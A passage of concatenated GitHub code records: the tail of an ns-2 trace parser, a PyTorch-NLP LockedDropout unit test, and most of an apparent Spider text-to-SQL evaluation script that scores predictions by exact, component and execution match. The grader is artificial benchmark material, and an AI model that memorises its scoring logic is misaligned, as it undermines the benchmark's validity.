float(split_list[1])\n    if end_time < float(split_list[1]):\n        end_time = float(split_list[1])\n    \n    if split_list[6]==\"exp\" and split_list[3]==\"AGT\":\n        if split_list[0] == \"s\":\n            sent_time[split_list[5]] = split_list[1]\n            sent_packets += 1\n        if split_list[0] == \"r\":\n            received_bytes += int(split_list[7])-header_bytes\n            \n            delay = float(split_list[1]) - float(sent_time[split_list[5]])\n            if delay < 0:\n                print(\"Error\")\n            totay_delay += delay\n\n            received_packets += 1\n    if split_list[6]==\"exp\" and split_list[0]==\"D\":\n        dropped_packets += 1\n\ntrace_file.close()\n\n# writing statistics to stat.txt\nprint(\"Dropped Packets \",dropped_packets)\n\nnetworkThroughput = 
(received_bytes*8)/((end_time-start_time)*1000)\nendToEndDelay = totay_delay/received_packets\npacketDeliveryRatio = (received_packets*1.0)/sent_packets*100\npacketDropRatio = (dropped_packets*1.0)/sent_packets*100\n\nstat_file = open(\"stat.txt\", \"a\")\n\nstat_file.write(str(networkThroughput)+\" \"+str(endToEndDelay)+\" \"+str(packetDeliveryRatio)+\" \"+str(packetDropRatio)+\"\\n\")\n\nstat_file.close()","repo_name":"fabihatasneem/CSE322-Networking-Sessional","sub_path":"Offline 2/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22821142826","text":"import random\nimport unittest\n\nimport torch\nimport numpy as np\n\nfrom torchnlp.nn import LockedDropout\n\n\nclass TestLockedDropout(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.input_ = torch.FloatTensor(\n random.randint(1, 10), random.randint(1, 10), random.randint(1, 10))\n self.probability = random.random()\n\n def test_init(self):\n LockedDropout(self.probability)\n\n def test_forward(self):\n dropout = LockedDropout(self.probability)\n output = dropout.forward(self.input_)\n\n # Check sizes\n self.assertEqual(output.size(), self.input_.size())\n\n # Check types\n self.assertEqual(output.type(), 'torch.FloatTensor')\n\n def test_forward_eval(self):\n dropout = LockedDropout(self.probability).eval()\n output = dropout.forward(self.input_)\n\n # Check sizes\n np.equal(output.numpy(), self.input_.numpy())\n","repo_name":"PetrochukM/PyTorch-NLP","sub_path":"tests/nn/test_lock_dropout.py","file_name":"test_lock_dropout.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":2198,"dataset":"github-code","pt":"31"} +{"seq_id":"70968933527","text":"import asyncio\nimport configparser\nimport json\nimport os\nimport shutil\nfrom typing import Tuple, Any, List, Set\nfrom itertools import product\nimport random\nimport re\nimport sqlite3\nfrom collections import defaultdict\n\nimport sqlparse \nfrom ratsql.datasets.spider_lib.process_sql import get_schema, Schema, get_sql\nfrom tqdm import tqdm\nimport time\n\n\nTIMEOUT = 60\nDISABLE_DISTINCT = True\nDISABLE_VALUE = True\n\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nfrom ratsql.datasets.spider_lib.evaluation import build_foreign_key_map_from_json\nconfig = configparser.ConfigParser()\nconfig.read('evaluation_config.ini')\n\ngold_file = config['SPIDER']['DEV_GOLD']\npredicted_response = config['SPIDER']['PREDICTED_RESPONSE']\npredicted_response_json = config['SPIDER']['PREDICTED_RESPONSE_JSON']\ngt_txt = config['SPIDER']['GROUND_TRUTH_TXT']\npred_txt = config['SPIDER']['PRED_TXT']\ndatabase = config['SPIDER']['DATABASE']\ntables = config['SPIDER']['TABLES']\nmetrics_file = config['SPIDER']['METRICS_FILE']\n\n# Convert predicted response to json format \nwith open(predicted_response, 'r') as input_file:\n input_data = input_file.read()\n\nwith open(predicted_response_json, 'w') as output_file:\n data = json.loads(input_data)\n json_str = json.dumps(data)\n output_file.write(json_str)\n\n# Create ground truth text files\nshutil.copyfile(gold_file, gt_txt)\n\n# # Create predicted truth text files\nwith open(pred_txt, 'w') as f:\n for i in range(len(data['per_item'])):\n f.write(data['per_item'][i]['predicted'] +'\\n')\n \n\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", 
'/')\n\nwith open(gt_txt) as f:\n glist = []\n gseq_one = []\n for l in f.readlines():\n if len(l.strip()) == 0:\n glist.append(gseq_one)\n gseq_one = []\n else:\n lstrip = l.strip().split('\\t')\n gseq_one.append(lstrip)\n if len(gseq_one) != 0:\n glist.append(gseq_one)\n\nwith open(pred_txt) as f:\n plist = []\n pseq_one = []\n for l in f.readlines():\n if len(l.strip()) == 0:\n plist.append(pseq_one)\n pseq_one = []\n\n else:\n pseq_one.append(l.strip().split('\\t'))\n if len(pseq_one) != 0:\n plist.append(pseq_one)\n\n\ndef condition_has_or(conds):\n return 'or' in conds[1::2]\n\n\ndef condition_has_like(conds):\n return WHERE_OPS.index('like') in [cond_unit[1] for cond_unit in conds[::2]]\n\n\ndef condition_has_sql(conds):\n for cond_unit in conds[::2]:\n val1, val2 = cond_unit[3], cond_unit[4]\n if val1 is not None and type(val1) is dict:\n return True\n if val2 is not None and type(val2) is dict:\n return True\n return False\n\n\ndef val_has_op(val_unit):\n return val_unit[0] != UNIT_OPS.index('none')\n\n\ndef has_agg(unit):\n return unit[0] != AGG_OPS.index('none')\n\n\ndef accuracy(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef recall(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef F1(acc, rec):\n if (acc + rec) == 0:\n return 0\n return (2. * acc * rec) / (acc + rec)\n\n\ndef get_scores(count, pred_total, label_total):\n if pred_total != label_total:\n return 0,0,0\n elif count == pred_total:\n return 1,1,1\n return 0,0,0\n\n\ndef eval_sel(pred, label):\n pred_sel = pred['select'][1]\n label_sel = label['select'][1]\n label_wo_agg = [unit[1] for unit in label_sel]\n pred_total = len(pred_sel)\n label_total = len(label_sel)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_sel:\n if unit in label_sel:\n cnt += 1\n label_sel.remove(unit)\n if unit[1] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[1])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_where(pred, label):\n pred_conds = [unit for unit in pred['where'][::2]]\n label_conds = [unit for unit in label['where'][::2]]\n label_wo_agg = [unit[2] for unit in label_conds]\n pred_total = len(pred_conds)\n label_total = len(label_conds)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_conds:\n if unit in label_conds:\n cnt += 1\n label_conds.remove(unit)\n if unit[2] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[2])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_group(pred, label):\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n pred_total = len(pred_cols)\n label_total = len(label_cols)\n cnt = 0\n pred_cols = [pred.split(\".\")[1] if \".\" in pred else pred for pred in pred_cols]\n label_cols = [label.split(\".\")[1] if \".\" in label else label for label in label_cols]\n for col in pred_cols:\n if col in label_cols:\n cnt += 1\n label_cols.remove(col)\n return label_total, pred_total, cnt\n\n\ndef eval_having(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['groupBy']) > 0:\n pred_total = 1\n if len(label['groupBy']) > 0:\n label_total = 1\n\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n if pred_total == label_total == 1 \\\n and pred_cols == label_cols \\\n and pred['having'] == label['having']:\n cnt = 1\n\n return label_total, pred_total, cnt\n\n\ndef eval_order(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['orderBy']) > 0:\n pred_total = 1\n if len(label['orderBy']) > 
0:\n label_total = 1\n if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and \\\n ((pred['limit'] is None and label['limit'] is None) or (pred['limit'] is not None and label['limit'] is not None)):\n cnt = 1\n return label_total, pred_total, cnt\n\n\ndef eval_and_or(pred, label):\n pred_ao = pred['where'][1::2]\n label_ao = label['where'][1::2]\n pred_ao = set(pred_ao)\n label_ao = set(label_ao)\n\n if pred_ao == label_ao:\n return 1,1,1\n return len(pred_ao),len(label_ao),0\n\n\ndef get_nestedSQL(sql):\n nested = []\n for cond_unit in sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]:\n if type(cond_unit[3]) is dict:\n nested.append(cond_unit[3])\n if type(cond_unit[4]) is dict:\n nested.append(cond_unit[4])\n if sql['intersect'] is not None:\n nested.append(sql['intersect'])\n if sql['except'] is not None:\n nested.append(sql['except'])\n if sql['union'] is not None:\n nested.append(sql['union'])\n return nested\n\n\ndef eval_nested(pred, label):\n label_total = 0\n pred_total = 0\n cnt = 0\n if pred is not None:\n pred_total += 1\n if label is not None:\n label_total += 1\n if pred is not None and label is not None:\n cnt += Evaluator().eval_exact_match(pred, label)\n return label_total, pred_total, cnt\n\n\ndef eval_IUEN(pred, label):\n lt1, pt1, cnt1 = eval_nested(pred['intersect'], label['intersect'])\n lt2, pt2, cnt2 = eval_nested(pred['except'], label['except'])\n lt3, pt3, cnt3 = eval_nested(pred['union'], label['union'])\n label_total = lt1 + lt2 + lt3\n pred_total = pt1 + pt2 + pt3\n cnt = cnt1 + cnt2 + cnt3\n return label_total, pred_total, cnt\n\n\ndef get_keywords(sql):\n res = set() \n if len(sql['where']) > 0:\n res.add('where')\n if len(sql['groupBy']) > 0:\n res.add('group')\n if len(sql['having']) > 0:\n res.add('having')\n if len(sql['orderBy']) > 0:\n res.add(sql['orderBy'][0])\n res.add('order')\n if sql['limit'] is not None:\n res.add('limit')\n if sql['except'] is not None:\n res.add('except')\n if sql['union'] is not None:\n res.add('union')\n if sql['intersect'] is not None:\n res.add('intersect')\n\n # or keyword\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n if len([token for token in ao if token == 'or']) > 0:\n res.add('or')\n\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n # not keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[0]]) > 0:\n res.add('not')\n\n # in keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('in')]) > 0:\n res.add('in')\n\n # like keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')]) > 0:\n res.add('like')\n\n return res\n\n\ndef eval_keywords(pred, label):\n pred_keywords = get_keywords(pred)\n label_keywords = get_keywords(label)\n pred_total = len(pred_keywords)\n label_total = len(label_keywords)\n cnt = 0\n\n for k in pred_keywords:\n if k in label_keywords:\n cnt += 1\n return label_total, pred_total, cnt\n\n\ndef count_agg(units):\n return len([unit for unit in units if has_agg(unit)])\n\n\ndef count_component1(sql):\n count = 0\n if len(sql['where']) > 0:\n count += 1\n if len(sql['groupBy']) > 0:\n count += 1\n if len(sql['orderBy']) > 0:\n count += 1\n if sql['limit'] is not None:\n count += 1\n if len(sql['from']['table_units']) > 0: # JOIN\n count += len(sql['from']['table_units']) - 1\n\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n count += len([token for token in ao if token == 
'or'])\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n count += len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')])\n\n return count\n\n\ndef count_component2(sql):\n nested = get_nestedSQL(sql)\n return len(nested)\n\n\ndef count_others(sql):\n count = 0\n # number of aggregation\n agg_count = count_agg(sql['select'][1])\n agg_count += count_agg(sql['where'][::2])\n agg_count += count_agg(sql['groupBy'])\n if len(sql['orderBy']) > 0:\n agg_count += count_agg([unit[1] for unit in sql['orderBy'][1] if unit[1]] +\n [unit[2] for unit in sql['orderBy'][1] if unit[2]])\n agg_count += count_agg(sql['having'])\n if agg_count > 1:\n count += 1\n\n # number of select columns\n if len(sql['select'][1]) > 1:\n count += 1\n\n # number of where conditions\n if len(sql['where']) > 1:\n count += 1\n\n # number of group by clauses\n if len(sql['groupBy']) > 1:\n count += 1\n\n return count\n\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\n\nclass Evaluator:\n \"\"\"A simple evaluator\"\"\"\n def __init__(self):\n self.partial_scores = None\n\n def eval_hardness(self, sql):\n count_comp1_ = count_component1(sql)\n count_comp2_ = count_component2(sql)\n count_others_ = count_others(sql)\n\n if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:\n return \"easy\"\n elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \\\n (count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):\n return \"medium\"\n elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \\\n (2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \\\n (count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):\n return \"hard\"\n else:\n return \"extra\"\n\n def eval_exact_match(self, pred, label):\n partial_scores = self.eval_partial_match(pred, label)\n self.partial_scores = partial_scores\n\n for key, score in partial_scores.items():\n if score['f1'] != 1:\n return 0\n\n if len(label['from']['table_units']) > 0:\n label_tables = sorted(label['from']['table_units'])\n pred_tables = sorted(pred['from']['table_units'])\n return label_tables == pred_tables\n return 1\n\n def eval_partial_match(self, pred, label):\n res = {}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_group(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_having(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, 
pred_total, cnt = eval_order(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_and_or(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_IUEN(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_keywords(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n return res\n \ndef postprocess(query: str) -> str:\n query = query.replace('> =', '>=').replace('< =', '<=').replace('! =', '!=')\n return query\n\ndef remove_distinct(s):\n toks = [t.value for t in list(sqlparse.parse(s)[0].flatten())]\n return ''.join([t for t in toks if t.lower() != 'distinct'])\n\n\ndef replace_cur_year(query: str) -> str:\n return re.sub(\n \"YEAR\\s*\\(\\s*CURDATE\\s*\\(\\s*\\)\\s*\\)\\s*\", \"2020\", query, flags=re.IGNORECASE\n )\n\n# get the database cursor for a sqlite database path\ndef get_cursor_from_path(sqlite_path: str):\n try:\n if not os.path.exists(sqlite_path):\n print(\"Openning a new connection %s\" % sqlite_path)\n connection = sqlite3.connect(sqlite_path)\n except Exception as e:\n print(sqlite_path)\n raise e\n connection.text_factory = lambda b: b.decode(errors=\"ignore\")\n cursor = connection.cursor()\n return cursor\n\nasync def exec_on_db_(sqlite_path: str, query: str) -> Tuple[str, Any]:\n query = replace_cur_year(query)\n cursor = get_cursor_from_path(sqlite_path)\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n cursor.close()\n cursor.connection.close()\n return \"result\", result\n except Exception as e:\n cursor.close()\n cursor.connection.close()\n return \"exception\", e\n \nasync def exec_on_db(\n sqlite_path: str, query: str, process_id: str = \"\", timeout: int = TIMEOUT\n) -> Tuple[str, Any]:\n try:\n return await asyncio.wait_for(exec_on_db_(sqlite_path, query), timeout)\n except asyncio.TimeoutError:\n return ('exception', TimeoutError)\n except Exception as e:\n return (\"exception\", e)\n\ndef get_constraint_permutation(tab1_sets_by_columns: List[Set], result2: List[Tuple]):\n num_cols = len(result2[0])\n perm_constraints = [{i for i in range(num_cols)} for _ in range(num_cols)]\n if num_cols <= 3:\n return product(*perm_constraints)\n\n # we sample 20 rows and constrain the space of permutations\n for _ in range(20):\n random_tab2_row = random.choice(result2)\n\n for tab1_col in range(num_cols):\n for tab2_col in set(perm_constraints[tab1_col]):\n if random_tab2_row[tab2_col] not in tab1_sets_by_columns[tab1_col]:\n perm_constraints[tab1_col].remove(tab2_col)\n return product(*perm_constraints)\n\n\ndef permute_tuple(element: Tuple, perm: Tuple) -> Tuple:\n assert len(element) == len(perm)\n return tuple([element[i] for i in perm])\n\ndef unorder_row(row: Tuple) -> Tuple:\n return tuple(sorted(row, key=lambda x: str(x) + str(type(x))))\n\ndef quick_rej(result1: List[Tuple], result2: List[Tuple], order_matters: bool) -> bool:\n s1 = [unorder_row(row) for row in result1]\n s2 = [unorder_row(row) for row in result2]\n if order_matters:\n return s1 == s2\n else:\n 
return set(s1) == set(s2)\n\n# return whether two bag of relations are equivalent\ndef multiset_eq(l1: List, l2: List) -> bool:\n if len(l1) != len(l2):\n return False\n d = defaultdict(int)\n for e in l1:\n d[e] = d[e] + 1\n for e in l2:\n d[e] = d[e] - 1\n if d[e] < 0:\n return False\n return True\n\ndef result_eq(result1: List[Tuple], result2: List[Tuple], order_matters: bool) -> bool:\n if len(result1) == 0 and len(result2) == 0:\n return True\n\n if len(result1) != len(result2):\n return False\n\n num_cols = len(result1[0])\n\n if len(result2[0]) != num_cols:\n return False\n\n if not quick_rej(result1, result2, order_matters):\n return False\n\n\n tab1_sets_by_columns = [{row[i] for row in result1} for i in range(num_cols)]\n\n for perm in get_constraint_permutation(tab1_sets_by_columns, result2):\n if len(perm) != len(set(perm)):\n continue\n if num_cols == 1:\n result2_perm = result2\n else:\n result2_perm = [permute_tuple(element, perm) for element in result2]\n if order_matters:\n if result1 == result2_perm:\n return True\n else:\n if set(result1) == set(result2_perm) and multiset_eq(result1, result2_perm):\n return True\n return False\n\n\ndef eval_exec_match(db, p_str, g_str):\n\n p_str, g_str = postprocess(p_str), postprocess(g_str)\n \n p_str = remove_distinct(p_str)\n g_str = remove_distinct(g_str)\n\n order_matters = 'order by' in g_str.lower()\n\n db_dir = os.path.dirname(db)\n db_paths = [os.path.join(db_dir, basename) for basename in os.listdir(db_dir) if '.sqlite' in basename]\n\n preds = [p_str]\n\n for pred in preds:\n ranger = db_paths\n pred_passes = 1\n for db_path in ranger:\n g_flag, g_denotation = asyncio.run(exec_on_db(db_path, g_str))\n p_flag, p_denotation = asyncio.run(exec_on_db(db_path, pred))\n\n # we should expect the gold to be succesfully executed on the database\n assert g_flag != 'exception', 'gold query %s has error on database file %s' % (g_str, db_path)\n\n # wrong if execution fails\n if p_flag == 'exception':\n pred_passes = 0\n\n # if denotations are not equivalent, the prediction must be wrong\n elif not result_eq(g_denotation, p_denotation, order_matters=order_matters):\n pred_passes = 0\n if pred_passes == 0:\n break\n\n # the model prediction has the same denotation as the gold for all databases\n if pred_passes == 1:\n return 1\n\n # none of the predictions passed\n return 0\n\n# Rebuild SQL functions for value evaluation\ndef rebuild_cond_unit_val(cond_unit):\n if cond_unit is None or not DISABLE_VALUE:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n if type(val1) is not dict:\n val1 = None\n else:\n val1 = rebuild_sql_val(val1)\n if type(val2) is not dict:\n val2 = None\n else:\n val2 = rebuild_sql_val(val2)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_val(condition):\n if condition is None or not DISABLE_VALUE:\n return condition\n\n res = []\n for idx, it in enumerate(condition):\n if idx % 2 == 0:\n res.append(rebuild_cond_unit_val(it))\n else:\n res.append(it)\n return res\n\n\ndef rebuild_sql_val(sql):\n if sql is None or not DISABLE_VALUE:\n return sql\n\n sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])\n sql['having'] = rebuild_condition_val(sql['having'])\n sql['where'] = rebuild_condition_val(sql['where'])\n sql['intersect'] = rebuild_sql_val(sql['intersect'])\n sql['except'] = rebuild_sql_val(sql['except'])\n sql['union'] = rebuild_sql_val(sql['union'])\n\n return sql\n\n\n# Rebuild SQL functions for foreign key evaluation\ndef 
build_valid_col_units(table_units, schema):\n col_ids = [table_unit[1] for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]\n prefixs = [col_id[:-2] for col_id in col_ids]\n valid_col_units= []\n for value in schema.idMap.values():\n if '.' in value and value[:value.index('.')] in prefixs:\n valid_col_units.append(value)\n return valid_col_units\n\n\ndef rebuild_col_unit_col(valid_col_units, col_unit, kmap):\n if col_unit is None:\n return col_unit\n\n agg_id, col_id, distinct = col_unit\n if col_id in kmap and col_id in valid_col_units:\n col_id = kmap[col_id]\n if DISABLE_DISTINCT:\n distinct = None\n return agg_id, col_id, distinct\n\n\ndef rebuild_val_unit_col(valid_col_units, val_unit, kmap):\n if val_unit is None:\n return val_unit\n\n unit_op, col_unit1, col_unit2 = val_unit\n col_unit1 = rebuild_col_unit_col(valid_col_units, col_unit1, kmap)\n col_unit2 = rebuild_col_unit_col(valid_col_units, col_unit2, kmap)\n return unit_op, col_unit1, col_unit2\n\n\ndef rebuild_table_unit_col(valid_col_units, table_unit, kmap):\n if table_unit is None:\n return table_unit\n\n table_type, col_unit_or_sql = table_unit\n if isinstance(col_unit_or_sql, tuple):\n col_unit_or_sql = rebuild_col_unit_col(valid_col_units, col_unit_or_sql, kmap)\n return table_type, col_unit_or_sql\n\n\ndef rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):\n if cond_unit is None:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n val_unit = rebuild_val_unit_col(valid_col_units, val_unit, kmap)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_col(valid_col_units, condition, kmap):\n for idx in range(len(condition)):\n if idx % 2 == 0:\n condition[idx] = rebuild_cond_unit_col(valid_col_units, condition[idx], kmap)\n return condition\n\n\ndef rebuild_select_col(valid_col_units, sel, kmap):\n if sel is None:\n return sel\n distinct, _list = sel\n new_list = []\n for it in _list:\n agg_id, val_unit = it\n new_list.append((agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap)))\n if DISABLE_DISTINCT:\n distinct = None\n return distinct, new_list\n\n\ndef rebuild_from_col(valid_col_units, from_, kmap):\n if from_ is None:\n return from_\n\n from_['table_units'] = [rebuild_table_unit_col(valid_col_units, table_unit, kmap) for table_unit in from_['table_units']]\n from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)\n return from_\n\n\ndef rebuild_group_by_col(valid_col_units, group_by, kmap):\n if group_by is None:\n return group_by\n\n return [rebuild_col_unit_col(valid_col_units, col_unit, kmap) for col_unit in group_by]\n\n\ndef rebuild_order_by_col(valid_col_units, order_by, kmap):\n if order_by is None or len(order_by) == 0:\n return order_by\n\n direction, val_units = order_by\n new_val_units = [rebuild_val_unit_col(valid_col_units, val_unit, kmap) for val_unit in val_units]\n return direction, new_val_units\n\n\ndef rebuild_sql_col(valid_col_units, sql, kmap):\n if sql is None:\n return sql\n\n sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)\n sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)\n sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)\n sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)\n sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)\n sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)\n sql['intersect'] = rebuild_sql_col(valid_col_units, sql['intersect'], 
kmap)\n sql['except'] = rebuild_sql_col(valid_col_units, sql['except'], kmap)\n sql['union'] = rebuild_sql_col(valid_col_units, sql['union'], kmap)\n\n return sql\n\n\nevaluator = Evaluator()\nlevels = ['easy', 'medium', 'hard', 'extra', 'all']\npartial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\nentries = []\nscores = {}\n\nfor level in levels:\n scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}\n scores[level]['exec'] = 0\n for type_ in partial_types:\n scores[level]['partial'][type_] = {'acc': 0., 'rec': 0., 'f1': 0.,'acc_count':0,'rec_count':0}\n\n\nfor i, (p, g) in enumerate(zip(plist, glist)):\n if (i + 1) % 10 == 0:\n print('Evaluating %dth prediction' % (i + 1))\n for idx, pg in tqdm(enumerate(zip(p, g))):\n p, g = pg\n p_str = p[0]\n p_str = p_str.replace(\"value\", \"1\")\n g_str, db = g\n db_name = db\n db = os.path.join(database, db, db + \".sqlite\")\n schema = Schema(get_schema(db))\n g_sql = get_sql(schema, g_str)\n hardness = evaluator.eval_hardness(g_sql)\n if idx > 3:\n idx = \"> 4\"\n else:\n idx += 1\n scores[hardness]['count'] += 1\n scores['all']['count'] += 1\n\n try:\n p_sql = get_sql(schema, p_str)\n except:\n p_sql = {\n \"except\": None,\n \"from\": {\n \"conds\": [],\n \"table_units\": []\n },\n \"groupBy\": [],\n \"having\": [],\n \"intersect\": None,\n \"limit\": None,\n \"orderBy\": [],\n \"select\": [\n False,\n []\n ],\n \"union\": None,\n \"where\": []\n }\n\n exec_score = eval_exec_match(db=db, p_str=p_str, g_str=g_str)\n if exec_score:\n scores[hardness]['exec'] += 1\n scores['all']['exec'] += 1\n\n kmaps = build_foreign_key_map_from_json(tables)\n\n kmap = kmaps[db_name]\n g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)\n g_sql = rebuild_sql_val(g_sql)\n g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)\n p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)\n p_sql = rebuild_sql_val(p_sql)\n p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)\n exact_score = evaluator.eval_exact_match(p_sql, g_sql)\n partial_scores = evaluator.partial_scores\n\n # if exact_score == 0:\n # print(\"{} pred: {}\".format(hardness, p_str))\n # print(\"{} gold: {}\".format(hardness, g_str))\n # print(\"\")\n scores[hardness]['exact'] += exact_score\n scores['all']['exact'] += exact_score\n\n for type_ in partial_types:\n # print(partial_scores[type_]['acc'], partial_scores[type_]['rec'], partial_scores[type_]['f1'])\n if partial_scores[type_]['pred_total'] > 0:\n scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores[hardness]['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores[hardness]['partial'][type_]['rec_count'] += 1\n\n scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n if partial_scores[type_]['pred_total'] > 0:\n scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores['all']['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores['all']['partial'][type_]['rec_count'] += 1\n\n scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n entries.append({\n 'predictSQL': p_str,\n 'goldSQL': g_str,\n 'hardness': hardness,\n 'exact': exact_score,\n 'partial': partial_scores\n })\n\nwith 
open(\"rat-sql/evaluation/data/metrics.txt\", 'w') as file:\n\n    file.write('-------------- METRICS --------------\\n\\n')\n\n    types = ['all', 'easy', 'medium', 'hard', 'extra']\n    partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n                    'group', 'order', 'and/or', 'IUEN', 'keywords']\n\n    for type in types:\n        if type == 'all':\n            file.write('Across all hardness levels\\n')\n        else:\n            file.write('\\n===========================================\\n\\n')\n            file.write('HARDNESS: ' + str(type) + '\\n')\n\n        count = scores[type]['count']\n        file.write('Total number of queries: ' + str(count) + '\\n\\n')\n\n        exact_match = scores[type]['exact']\n        acc = round(exact_match / count , 3)\n        \n        exec_match = scores[type]['exec']\n        exec_acc = round(exec_match / count , 3)\n\n        file.write('Overall scores\\n')\n        file.write('---------------\\n')\n        file.write('(Logical form) Exact match accuracy: ' + str(acc) + '\\n')\n        file.write('Execution accuracy: ' + str(exec_acc) + '\\n\\n')\n\n        file.write('Component matching accuracy \\n')\n        file.write('----------------------------\\n')\n\n        for partial_type in partial_types:\n            partial_count = scores[type]['partial'][partial_type]['acc_count']\n            partial_match = scores[type]['partial'][partial_type]['acc']\n\n            if partial_count == 0:\n                file.write(partial_type + \": 0\" + '\\n')\n            else:\n                partial_acc = round(partial_match / partial_count, 3)\n                file.write(partial_type + \": 